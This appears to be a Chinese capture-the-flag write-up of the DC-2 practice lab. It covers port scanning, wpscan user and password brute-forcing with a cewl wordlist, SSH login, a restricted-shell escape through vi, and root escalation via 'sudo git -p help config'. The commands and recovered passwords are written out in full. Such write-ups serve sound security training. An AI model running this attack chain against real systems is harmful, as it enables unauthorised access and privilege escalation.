OSCP系列靶场-Esay-DC-2

admin 2024年10月13日01:33:35评论16 views字数 2468阅读8分13秒阅读模式

获网安教程

免费&进群

OSCP系列靶场-Esay-DC-2  
OSCP系列靶场-Esay-DC-2

本文由掌控安全学院-杳若投稿

总结

getwebshell → 发现wordpressCMS → 利用专用扫描器wpscan → 枚举用户名 → 利用cewl生成个性化密码 → wpscan枚举密码 → 发现2个用户以及密码 → 只能登陆其中一个

提 权 思 路 → rbash逃逸 → 环境变量逃逸 → 内部利用su登录另一个用户 → sudo-git提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.208

OSCP系列靶场-Esay-DC-2

  • 启动靶机
    获取目标机器IP > 192.168.230.194

OSCP系列靶场-Esay-DC-2

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次

    1. sudo nmap --min-rate 10000-p-192.168.230.194

OSCP系列靶场-Esay-DC-2

通过两次收集到的端口:→80,7744

目标端口对应服务探测

  1. # tcp探测

  2. sudo nmap -sT -sV -O -sC -p80,7744192.168.230.194

OSCP系列靶场-Esay-DC-2

信息收集-端口测试

发现一个是http,另一个是ssh。突破口应该在http

80-HTTP端口的信息收集

访问 http://192.168.230.194:80 发现特别慢,存在重定向,进行host绑定

OSCP系列靶场-Esay-DC-2

host绑定

发现访问IP被重定向,修改host

  1. vim /etc/hosts

  2. 192.168.230.194 dc-2

OSCP系列靶场-Esay-DC-2
重新访问该端口,发现是wordpress

OSCP系列靶场-Esay-DC-2

信息收集-网站指纹

  1. whatweb -v http://192.168.230.194:80

CMSWordPress 4.7.10

OSCP系列靶场-Esay-DC-2

漏洞利用-网站指纹

  1. msfconsole

  2. searchsploit WordPress4.7.10

查看了一下wordpress的内容都和插件有关

OSCP系列靶场-Esay-DC-2

信息收集-源码查看

  1. # 包括文章中是否写明一些敏感信息

  2. curl http://dc-2

  3. # 利用html2text转换纯文本方便查看

  4. curl http://dc-2 | html2text

没什么内容

OSCP系列靶场-Esay-DC-2

信息收集-目录扫描

信息收集-目录扫描初步
  1. dirsearch -u http://dc-2 -x 302,403

查看了一下目录,基本确定是由wpscan组成

OSCP系列靶场-Esay-DC-2

漏洞探测-wpscan扫描

针对wordpress的专用扫描器

  1. # -e枚举 ap枚举插件 u枚举用户名 t枚举主题

  2. wpscan --url http://dc-2 --enumerate ap,u,t

OSCP系列靶场-Esay-DC-2

OSCP系列靶场-Esay-DC-2
发现了3个用户名adminjerrytom

信息收集-网站提示

乘着在扫描的空挡,点点点,发现有flag1的提示

OSCP系列靶场-Esay-DC-2
提示可以用cewl生成密码字典
又点了几个端点,发现登录端点,发散思维可以爆破账户密码

OSCP系列靶场-Esay-DC-2

漏洞利用-getwebshell

暴力破解-cewl字典生成

发现站点极具个人特色,尝试生成对应的字典

  1. # 爬取url写入到字典

  2. cewl http://dc-2 > passwords.txt

OSCP系列靶场-Esay-DC-2

wpscan枚举密码

利用wpscan枚举密码

  1. # 密码枚举

  2. wpscan --url http://dc-2 --passwords passwords.txt

OSCP系列靶场-Esay-DC-2
得到账号密码信息

  1. [SUCCESS]- jerry / adipiscing

  2. [SUCCESS]- tom / parturient

OSCP系列靶场-Esay-DC-2
对应的账号密码是否可以用在SSH上呢?

22-SSH账号密码登录

获取账号密码之后利用SSH进行登录 发现jerry登录不上!tom登录上了

  1. sudo ssh tom@192.168.230.194-p7744

  2. password > parturient

OSCP系列靶场-Esay-DC-2

内网遨游-getshell

刚进入之后发现连find命令都没法用,是rbash

OSCP系列靶场-Esay-DC-2

Linux用户交互shell受限逃逸

枚举是找到突破方法的重要组成部分。

  1. # 检查当前环境遍历可以用的命令

  2. echo $PATH

  3. # 查看里面的命令有哪些

  4. ls [$PATH]

OSCP系列靶场-Esay-DC-2
发现了4个可以用的命令
如果发现有东西的话 访问 https://gtfobins.github.io 寻找
发现了关于vishell

OSCP系列靶场-Esay-DC-2
方法a尝试了不行,试试方法b

  1. vi flag3.txt

  2. -----添加-----

  3. :set shell=/bin/sh

  4. :shell

成功获得了一个shell

OSCP系列靶场-Esay-DC-2
发现只获得了部分的权限,可以用cd

OSCP系列靶场-Esay-DC-2

修改环境变量逃逸

我们通过vi获得了一个高一些的shell,查看PATH之后可以尝试修改环境变量

  1. # 查看环境变量

  2. echo $PATH

  3. # 重写环境变量

  4. PATH=/usr/bin:/bin

OSCP系列靶场-Esay-DC-2

FLAG1获取

  1. $ find /-name local.txt 2>/dev/null

  2. /home/tom/local.txt

  3. $ cat /home/tom/local.txt

  4. ***********************

OSCP系列靶场-Esay-DC-2

权限提升

Linux提权-sudo提权尝试(失败)

查找具有sudo权限,且不需要密码的可提权文件

  1. # 利用sudo -l寻找

  2. sudo -l

发现需要密码,尝试失败

OSCP系列靶场-Esay-DC-2

Linux提权-suid提权尝试(失败)

  1. # -user 指定文件拥有者

  2. find /-user root -perm -4000-print2>/dev/null

  3. # -perm 文件权限

  4. find /-perm -u=s -type f 2>/dev/null

  5. # -exec 执行系统命令

  6. find /-user root -perm -4000-exec ls -ldb {};

OSCP系列靶场-Esay-DC-2

Linux提权-登录另外用户

突然想起刚才看到的flag3.txt中提到了su
在利用wpscan时我们获取了另一个用户的密码,尝试登录另一个用户尝试

  1. su jerry

  2. password > adipiscing

OSCP系列靶场-Esay-DC-2

Linux提权-sudo提权尝试

查找具有sudo权限,且不需要密码的可提权文件

  1. # 利用sudo -l寻找

  2. sudo -l

发现了git命令

OSCP系列靶场-Esay-DC-2
去查看之后选择其中的一条命令

OSCP系列靶场-Esay-DC-2

使用了

  1. # 使用了第二条发现成功

  2. sudo git -p help config

  3. # 成功提权

  4. !/bin/sh

就是回显有点问题

OSCP系列靶场-Esay-DC-2

FLAG2获取

  1. cat /root/proof.txt

  2. # **********************

完结撒花~

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

OSCP系列靶场-Esay-DC-2

原文始发于微信公众号(掌控安全EDU):OSCP系列靶场-Esay-DC-2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日01:33:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP系列靶场-Esay-DC-2https://cn-sec.com/archives/1910628.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息